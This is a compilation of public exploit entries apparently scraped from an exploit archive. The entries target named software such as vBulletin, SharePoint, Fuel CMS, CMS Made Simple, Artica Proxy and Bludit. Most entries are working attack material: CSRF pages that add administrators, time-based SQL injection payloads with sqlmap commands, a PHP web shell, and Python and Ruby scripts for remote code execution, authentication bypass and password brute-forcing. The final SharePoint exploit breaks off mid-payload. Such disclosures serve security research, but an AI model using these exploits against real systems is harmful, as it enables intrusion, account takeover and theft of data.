HireHackking

# Exploit Title: All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin) # Discovery by: LiquidWorm # Discovery Date: 2020-08-05 # Vendor Homepage: https://www.all-dynamics.de <!DOCTYPE html> <!-- All-Dynamics Software enlogic:show Digital Signage System 2.0.2 CSRF Add Admin Vendor: All-Dynamics Software GmbH Product web page: https://www.all-dynamics.de Affected version: 2.0.2 (Build 2098) ILP32W 0/1/3/1597919619 Summary: Bring communication with your customers, guests or employees to a new level. You can design content individually and uncomplicated centrally and simply present it in different locations. Whether on large displays, steles, digital signs or on a projector, with enlogic:show your content will appear on the selected display in a calendar-controlled and precise manner. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5577.php Tested on: enlogic:show server Microsoft Windows Server 2019 Microsoft Windows Server 2016 Microsoft Windows Server 2012 Microsoft Windows 10 GNU/Linux Apache PHP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5576 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5576.php 21.07.2020 --> <html> <body onload="runcsrf()"> <h2>Grants the user the global administrative right. Administrative users are no longer under the control of the rights structure.</h2> <h1>Global: Superior rolebased rights.</h1> <form name="saveuser" action="http://localhost:8802/index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65&ES_CMD=display.users.saveuser" method="POST" target="frame0"> <input type="hidden" name="SAVECMD" value="usr&#95;generic" /> <input type="hidden" name="NEWUSER" value="1" /> <input type="hidden" name="USERNAME" value="Intruder" /> <input type="hidden" name="USERFULLNAME" value="ZSL" /> <input type="hidden" name="USERTAGS" value="tags" /> <input type="hidden" name="USEREMAIL" value="csrf&#64;zsl&#46;be" /> <input type="hidden" name="USERPHONE" value="333&#45;222&#45;1111" /> <input type="hidden" name="PWEXPIRE" value="0" /> <input type="hidden" name="NEWPW1" value="Pa$$w0rd!" /> <input type="hidden" name="NEWPW2" value="Pa$$w0rd!" /> <input type="hidden" name="USERLANG" value="en" /> <input type="hidden" name="STARTSCREEN" value="display&#46;calendar" /> <input type="hidden" name="USERCUSTIMEOUT" value="20" /> </form> <form name="addadmin" action="http://localhost:8802/index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65&ES_CMD=display.users.saveuser" method="POST" target="frame1"> <input type="hidden" name="SAVECMD" value="usr&#95;rights" /> <input type="hidden" name="SYSFLAGS&#91;&#93;" value="TYPE&#95;SYSADMIN" /> </form> <iframe name="frame0"></iframe> <iframe name="frame1"></iframe> <script> function runcsrf() { document.saveuser.submit(); document.addadmin.submit(); } </script> </body> </html>

# Exploit Title: Daily Expenses Management System 1.0 - 'item' SQL Injection # Date: 2020-08-05 # Exploit Author: Edo Maland # Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html # Software Link: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html # Version: 1.0 # Tested on: XAMPP / Windows 10 ------------------------------------------------------------------------------------------------------------------------------------- # Feature: Add Expenses # Vulnerable file: add-expense.php # Vulnerable parameter : - item - costitem # PoC Url : http://example.com/dets/add-expense.php Methode : Post # Burpsuite Requests POST /dets/add-expense.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 138 Origin: http://example.com Connection: close Referer: http://example.com/dets/add-expense.php Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9 Upgrade-Insecure-Requests: 1 dateexpense=1337-11-11&item=1%27+AND+%28SELECT+8429+FROM+%28SELECT%28SLEEP%285%29%29%29IWeV%29+AND+%27hmPP%27%3D%27hmPP&costitem=2&submit= # Payload Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: dateexpense=1337-11-11&item=1' AND (SELECT 8429 FROM (SELECT(SLEEP(5)))IWeV) AND 'hmPP'='hmPP&costitem=2&submit= # Sqlmap Command sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3 ------------------------------------------------------------------------------------------------------------------------------------- # Feature: Edit Profile # Vulnerable file: user-profile.php # Vulnerable parameter : - fullname # PoC Url : http://example.com/dets/user-profile.php Methode : Post # Burpsuite Requests POST /dets/user-profile.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 189 Origin: http://example.com Connection: close Referer: http://example.com/dets/user-profile.php Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9 Upgrade-Insecure-Requests: 1 fullname=%27+AND+%28SELECT+2029+FROM+%28SELECT%28SLEEP%285%29%29%29JJJm%29+AND+%27UMUq%27%3D%27UMUq&email=info%40sql.id&contactnumber=1337173137&regdate=2020-08-05+13%3A49%3A51&submit= # Payload Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fullname=admin3' AND (SELECT 2029 FROM (SELECT(SLEEP(5)))JJJm) AND 'UMUq'='UMUq&email=info@sql.id&contactnumber=1337173137&regdate=2020-08-05 13:49:51&submit= # Sqlmap Command sqlmap -u "https://example.com/dets/user-profile.php" --data="fullname=admin3*&email=info%40sql.id&contactnumber=1337173137&regdate=2020-08-05+13%3A49%3A51&submit=" --random-agent --threads 5 --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" -v 3 --dbs ------------------------------------------------------------------------------------------------------------------------------------- # Feature: Expense Reports # Vulnerable file: - expense-monthwise-reports-detailed.php - expense-datewise-reports.php - expense-yearwise-reports.php # Vulnerable parameter : - fromdate - todate # PoC Url : http://example.com/dets/expense-monthwise-reports-detailed.php Methode : Post # Burpsuite Requests POST /dets/expense-yearwise-reports-detailed.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 45 Origin: http://example.com Connection: close Referer: http://example.com/dets/expense-yearwise-reports.php Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9 Upgrade-Insecure-Requests: 1 fromdate=2020-08-13'+AND+(SELECT+1473+FROM+(SELECT(SLEEP(5)))rhGI)+AND+'moGo'%3d'moGo&todate=2020-08-20&submit= # Payload Parameter: #1* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: fromdate=2020-08-13' AND (SELECT 1473 FROM (SELECT(SLEEP(5)))rhGI) AND 'moGo'='moGo&todate=2020-07-29&submit= # Sqlmap Command sqlmap -u "https://example.com/dets/expense-monthwise-reports-detailed.php" --data="fromdate=2020-08-13*&todate=2020-07-29&submit=" --random-agent --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" --dbs ------------------------------------------------------------------------------------------------------------------------------------- # Feature: Login Page # Bypass Login Using SQLi on Admin/Member # Vulnerable file: index.php # PoC URL : https://example.com/dets/index.php Logging in with following details: - Payload : "' OR 1=1 -- '"@sql.id # Burp Requests POST /dets/index.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: id,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 50 Origin: http://example.com Connection: close Referer: http://example.com/dets/index.php Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9 Upgrade-Insecure-Requests: 1 email="' OR 1=1 -- '"@sql.id&password=1337&login=login

# Exploit Title: BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path # Discovery Date: 2020-07-31 # Response from BarcodeOCR Support: 08/03/2020 # Exploit Author: Daniel Bertoni # Vendor Homepage: https://www.barcode-ocr.com/ # Version: 19.3.6 # Tested on: Windows Server 2016, Windows 10 # Find the Unquoted Service Path Vulnerability: C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ BarcodeOCR Auto BarcodeOCR C:\Program Files (x86)\BarcodeOCR\Service.exe # Service info: C:\sc qc CodeMeter.exe [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BarcodeOCR TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files (x86)\BarcodeOCR\Service.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : BarcodeOCR DIPENDENZE : SERVICE_START_NAME : LocalSystem # Exploit: A successful attempt to exploit this vulnerability could allow to execute code during startup or reboot with the elevated privileges.

# Exploit Title: ManageEngine ADSelfService Plus 6000 – Unauthenticated Remote Code Execution # Date: 2020-08-08 # Exploit Author: Bhadresh Patel # Vendor link: https://www.manageengine.com/company.html # Version: ADSelfService Plus build < 6003 # CVE : CVE-2020-11552 This is an article with PoC exploit video of ManageEngine ADSelfService Plus – Unauthenticated Remote Code Execution Vulnerability ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Title: ==== ManageEngine ADSelfService Plus – Unauthenticated Remote Code Execution Vulnerability CVE ID: ======= CVE-2020-11552 Date: ==== 08/08/2020 (dd/mm/yyyy) Vendor: ====== As the IT management division of Zoho Corporation, ManageEngine prioritizes flexible solutions that work for all businesses, regardless of size or budget. ManageEngine crafts comprehensive IT management software with a focus on making your job easier. Our 90+ products and free tools cover everything your IT needs, at prices you can afford. From network and device management to security and service desk software, we're bringing IT together for an integrated, overarching approach to optimize your IT. Vendor link: https://www.manageengine.com/company.html Vulnerable Product: ============== ManageEngine ADSelfService Plus is an integrated self-service password management and single sign on solution. This solution helps domain users perform self-service password reset, self-service account unlock, employee self-update of personal details (e.g., mobile numbers and photos) in Microsoft Windows Active Directory. ADSelfService Plus also provides users with secure, one-click access to all SAML-supported enterprise applications, including Office 365, Salesforce, and G Suite, through Active Directory-based single sign-on (SSO). For improved security, ADSelfService Plus offers Windows two-factor authentication for all remote and local logins. Administrators find it easy to automate password resets, account unlocks while optimizing IT expenses associated with help desk calls. Product link: https://www.manageengine.com/products/self-service-password/?meadsol Abstract: ======= A remote code execution vulnerability exists in ManageEngine ADSelfService Plus Software when it does not properly enforce user privileges associated with Windows Certificate Dialog. This vulnerability could allow an unauthenticated attacker to remotely execute commands with system level privileges on target windows host. An attacker does not require any privilege on the target system in order to exploit this vulnerability. Report-Timeline: ============= 27/02/2020: Vendor notified 27/02/2020: Vendor response 28/02/2020: Marked duplicate 11/03/2020: Patch released 23/03/2020: Vendor responded regarding patch release update 26/03/2020: Patch tested and found that it partially fixed the issue. Reported back to the vendor. 18/04/2020: Shared updated report with new PoC 22/04/2020: Vendor acknowledged the issue 24/07/2020: Patch released ( https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6003-release-faceid-support ) 08/08/2020: Public disclosure Affected Software Version: ============= < ADSelfService Plus build 6003 Exploitation-Technique: =================== Remote Severity Rating (CVSS): =================== 9.8 (Critical) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) Details: ======= A remote code execution vulnerability exists in ManageEngine ADSelfService Plus Software when it does not properly enforce user privileges associated with Windows Certificate Dialog. This vulnerability could allow an unauthenticated attacker to remotely execute commands with system level privileges on target windows host. An attacker does not require any privilege on the target system in order to exploit this vulnerability. ManageEngine ADSelfService Plus thick client enables a user to perform self-service like password reset, self-service account unlock, etc by using self-service option on windows login screen. Upon selecting this option, ManageEngine ADSelfService Plus thick client software will be launched which will connect to a remote ADSelfServicePlus server to facilitate the self-service operations. A security alert can/will be triggered when “an unauthenticated attacker having physical access to the host issues a self-signed SSL certificate to the client”. Or, “a (default) self-signed SSL certificate is configured on ADSelfService Plus server”. “View Certificate” option from the security alert will allow an attacker with physical access or a remote attacker with RDP access, to export a displayed certificate to a file. This will further cascade to the standard dialog/wizard which will open file explorer as SYSTEM. By navigating file explorer through “C:\windows\system32\”, a cmd.exe can be launched as a SYSTEM. *PoC Video:* https://www.youtube.com/watch?v=slZRXffswnQ 01:00 to 05:30 : Setup the environment 05:30 to 06:34 : Exploitation Credits: ======= Bhadresh Patel ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Regards, -Bhadresh

# Exploit Title: Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password) # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: 2020-08-09 # Vendor Homepage: https://oswapp.com # Software Link: https://github.com/siamon123/warehouse-inventory-system/archive/master.zip # Version: 1.0 # Tested On: Windows 10 Pro + XAMPP | Python 2.7 # CWE-352: Cross-Site Request Forgery (CSRF) # CVSS Base Score: 7.5 # Impact Subscore: 5.9 # Exploitability Subscore: 1.6 # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in 'edit_user.php' webpage of OSWAPP's # Warehouuse Inventory System v1.0 allows remote attackers to change the admins password # via authenticated admin visiting a third-party site. <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://<IP_ADDRESS>/edit_user.php?id=1" method="POST"> <input type="hidden" name="password" value="Boku123!" /> <input type="hidden" name="update&#45;pass" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated) # Google Dork: - # Date: 2020-08-01 # Exploit Author: Roel van Beurden # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.7.zip # Version: 1.4.7 # Tested on: Linux Ubuntu 18.04 # CVE: CVE-2020-17463 1. Description: ---------------------- Fuel CMS 1.4.7 allows SQL Injection via parameter 'col' in pages/items, permissions/items, navigation/items and logs/items Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from one of the affected pages with 'col' parameter and save it like fuel.req Then run SQLmap to extract the data from the database: sqlmap -r fuel.req --risk=3 --level=5 --dbs --random-agent 3. Example payload: ---------------------- (time-based blind) /fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(5)))ULQV)&fuel_inline=0 4. Burpsuite request: ---------------------- GET /fuelcms/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location%20AND%20(SELECT%201340%20FROM%20(SELECT(SLEEP(5)))ULQV)&fuel_inline=0 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: ci_session=2pvc8gmus9he9fbesp3lkhlbc7oal188; fuel_eeed351bf4de904070ff77c1aef15576=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A7%3A%22english%22%3B%7D; fuel_ui_eeed351bf4de904070ff77c1aef15576=%2528%257Bleftnav_h3%253A%25220%257C0%257C0%257C0%2522%252C%2520fuel_permissions_items%253A%2522list%2522%252C%2520fuel_pages_items%253A%2522list%2522%252C%2520leftnav_hide%253A%25220%2522%252C%2520tabs_ms_assets_create%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a63773d3d%253A%25220%2522%252C%2520tabs_ms_assets_create_5a47396a637939305a584e30%253A%25220%2522%252C%2520tabs_ms_assets_create_615731685a32567a%253A%25220%2522%252C%2520fuel_navigation_items%253A%2522list%2522%257D%2529 Upgrade-Insecure-Requests: 1 5. Timeline: ---------------------- 2020-08-01: SQLi vulnerability found in Fuel CMS 1.4.7 2020-08-02: Reported vulnerability to vendor 2020-08-11: Vendor has patched the SQLi vulnerability in version 1.4.8

# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) # Google Dork: - # Date: 2020-07-29 # Exploit Author: Roel van Beurden # Vendor Homepage: https://www.cmsmadesimple.org/ # Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip # Version: 2.2.14 # Tested on: Linux Ubuntu 18.04 # CVE: N/A 1. Description: ---------------------- CMS Made Simple 2.2.14 allows Authenticated Arbitrary File Upload because the File Manager does not block .ptar and .phtml files. A malicious user can perform remote code execution. 2. Proof of Concept: ---------------------- - Create .phtml or .ptar file with malicious PHP payload; - Upload .phtml or .ptar file in the 'File Manager' module; - Click on the uploaded file to perform remote code execution. 3: Example payload: ---------------------- <?php system($_GET['cmd']);?> 4a: Burp request: ---------------------- GET /cmsms/uploads/rce.phtml?cmd=id HTTP/1.1 Host: 10.10.10.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: d2f3b04a992e92af78d4f451813df40fa6f4f4b4=2c462b984c95aa0a8d18f59e2dd21defb7d7e368%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiUm9lbCIsImVmZl91aWQiOm51bGwsImVmZl91c2VybmFtZSI6bnVsbCwiaGFzaCI6IiQyeSQxMCQ4NS5qSy5nTTMxZmJEQmlGTXlIYlQuUUR5eFRDekpsSVFncjhOS1FMbDhBSUlIUjVYeVNJZSJ9; __c=e9ef732e78dc5a9f603; CMSSESSIDde72be53c754=71mvdcppeeunddtap69k26ia4v Upgrade-Insecure-Requests: 1 4b: Burp response: ---------------------- HTTP/1.1 200 OK Date: Thu, 30 Jul 2020 23:14:47 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 54 Connection: close Content-Type: text/html; charset=UTF-8 uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution # Date: 2020-08-09 # Exploit Author: @zenofex # Vendor Homepage: https://www.vbulletin.com/ # Software Link: None # Version: 5.4.5 through 5.6.2 # Tested on: vBulletin 5.6.2 on Ubuntu 19.04 # CVE : None # vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code # execution vulnerability caused by incomplete patching of the previous # "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth # request to execute PHP code on a target vBulletin forum. #More info can be found at: #https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ #!/usr/bin/env python3 # vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex import argparse import requests import sys def run_exploit(vb_loc, shell_cmd): post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd} r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data) return r.text ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE') ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.') ARGS = ap.parse_args() while True: try: cmd = input("vBulletin5$ ") print(run_exploit(ARGS.location, cmd)) except KeyboardInterrupt: sys.exit("\nClosing shell...") except Exception as e: sys.exit(str(e))

# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-08-13 # Exploit Author: Dan Duffy # Vendor Homepage: http://articatech.net/ # Software Link: http://articatech.net/download2x.php?IsoOnly=yes # Version: 4.30.00000000 (REQUIRED) # Tested on: Debian # CVE : CVE-2020-17506 import requests import argparse from bs4 import BeautifulSoup def bypass_auth(session, args): login_endpoint = "/fw.login.php?apikey=" payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;" print("[+] Bypassing authentication...") session.get(args.host + login_endpoint + payload, verify=False) return session def run_command(session, args): cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command) print("[+] Running command: {}".format(args.command)) response = session.post(args.host + cmd_endpoint, verify=False) soup = BeautifulSoup(response.text, "html.parser") print(soup.find_all("code")[1].get_text()) def main(): parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.") parser.add_argument( "--host", help="The host to target. Format example: https://host:port", ) parser.add_argument("--command", help="The command to run") args = parser.parse_args() if not args.host or not args.command: parser.print_help() exit(0) session = requests.Session() session = bypass_auth(session, args) run_command(session, args) if __name__ == "__main__": main()

# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin) # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: August 2020-08-12 # Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/ # Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip # Version: 1.8.2 # Tested On: Windows 10 Pro + XAMPP # CWE-352: Cross-Site Request Forgery (CSRF) # Vulnerability Description: # Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via authenticated admin visiting a third-party site. ## Usage: + Change <IP||DOMAIN> to target IP address or domain name + Change <ADMIN> to target username + Change <PASSWORD> to target password ## CSRF POST Form Method <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://<IP||DOMAIN>/admin/load.php?id=user-managment" method="POST"> <input type="hidden" name="usernamec" value="<ADMIN>" /> <input type="hidden" name="useremail" value="ADMIN&#64;DOMAIN&#46;LOCAL" /> <input type="hidden" name="ntimezone" value="" /> <input type="hidden" name="userlng" value="en&#95;US" /> <input type="hidden" name="userpassword" value="<PASSWORD>" /> <input type="hidden" name="usereditor" value="1" /> <input type="hidden" name="Landing" value="" /> <input type="hidden" name="add&#45;user" value="Add&#32;New&#32;User" /> <input type="submit" value="Submit request" /> </form> </body> </html>

#!/usr/bin/env ruby ## Title: Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass ## Author: noraj (Alexandre ZANNI) ## Author website: https://pwn.by/noraj/ ## Date: 2020-08-16 ## Vendor Homepage: https://www.bludit.com/ ## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz ## Version: <= 3.9.2 ## Tested on: Bludit Version 3.9.2 # Vulnerability ## Discoverer: Rastating ## Discoverer website: https://rastating.github.io/ ## CVE: CVE-2019-17240 ## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2019-17240 ## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/ ## Patch: https://github.com/bludit/bludit/pull/1090 require 'httpclient' require 'docopt' # dirty workaround to remove this warning: # Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning. # see https://github.com/nahi/httpclient/issues/252 class WebAgent class Cookie < HTTP::Cookie def domain self.original_domain end end end def get_csrf(client, login_url) res = client.get(login_url) csrf_token = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0] end def auth_ok?(res) HTTP::Status.redirect?(res.code) && %r{/admin/dashboard}.match?(res.headers['Location']) end def bruteforce_auth(client, host, username, wordlist) login_url = host + '/admin/login' File.foreach(wordlist).with_index do |password, i| password = password.chomp csrf_token = get_csrf(client, login_url) headers = { 'X-Forwarded-For' => "#{i}-#{password[..4]}", } data = { 'tokenCSRF' => csrf_token, 'username' => username, 'password' => password, } puts "[*] Trying password: #{password}" auth_res = client.post(login_url, data, headers) if auth_ok?(auth_res) puts "\n[+] Password found: #{password}" break end end end doc = <<~DOCOPT Bludit <= 3.9.2 - Authentication Bruteforce Mitigation Bypass Usage: #{__FILE__} -r <url> -u <username> -w <path> [--debug] #{__FILE__} -H | --help Options: -r <url>, --root-url <url> Root URL (base path) including HTTP scheme, port and root folder -u <username>, --user <username> Username of the admin -w <path>, --wordlist <path> Path to the wordlist file --debug Display arguments -H, --help Show this screen Examples: #{__FILE__} -r http://example.org -u admin -w myWordlist.txt #{__FILE__} -r https://example.org:8443/bludit -u john -w /usr/share/wordlists/password/rockyou.txt DOCOPT begin args = Docopt.docopt(doc) pp args if args['--debug'] clnt = HTTPClient.new bruteforce_auth(clnt, args['--root-url'], args['--user'], args['--wordlist']) rescue Docopt::Exit => e puts e.message end

# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution # Google Dork: inurl:quicklinks.aspx # Date: 2020-08-14 # Exploit Author: West Shepherd # Vendor Homepage: https://www.microsoft.com # Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service # Pack 2, SharePoint Server 2019 # Tested on: Windows 2016 # CVE : CVE-2020-1147 # Credit goes to Steven Seele and Soroush Dalili # Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html #!/usr/bin/python from sys import argv, exit, stdout, stderr import argparse import requests from bs4 import BeautifulSoup from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests_ntlm import HttpNtlmAuth from urllib import quote, unquote import logging class Exploit: # To generate the gadget use: # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command" # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command" gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw==' control_path_quicklinks = '/_layouts/15/quicklinks.aspx' control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx' control_path = control_path_quicklinks def __init__( self, redirect=False, proxy_address='', username='', domain='', password='', target='' ): requests.packages.urllib3.disable_warnings(InsecureRequestWarning) self.username = '%s\\%s' % (domain, username) self.target = target self.password = password self.session = requests.session() self.redirect = redirect self.timeout = 0.5 self.proxies = { 'http': 'http://%s' % proxy_address, 'https': 'http://%s' % proxy_address } \ if proxy_address is not None \ and proxy_address != '' else {} self.headers = {} self.query_params = { 'Mode': "Suggestion" } self.form_values = { '__viewstate': '', '__SUGGESTIONSCACHE__': '' } self.cookies = {} self.payload = """\ <DataSet> <xs:schema xmlns="" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" id="somedataset"> <xs:element name="somedataset" msdata:IsDataSet="true" msdata:UseCurrentLocale="true"> <xs:complexType> <xs:choice minOccurs="0" maxOccurs="unbounded"> <xs:element name="Exp_x0020_Table"> <xs:complexType> <xs:sequence> <xs:element name="pwn" 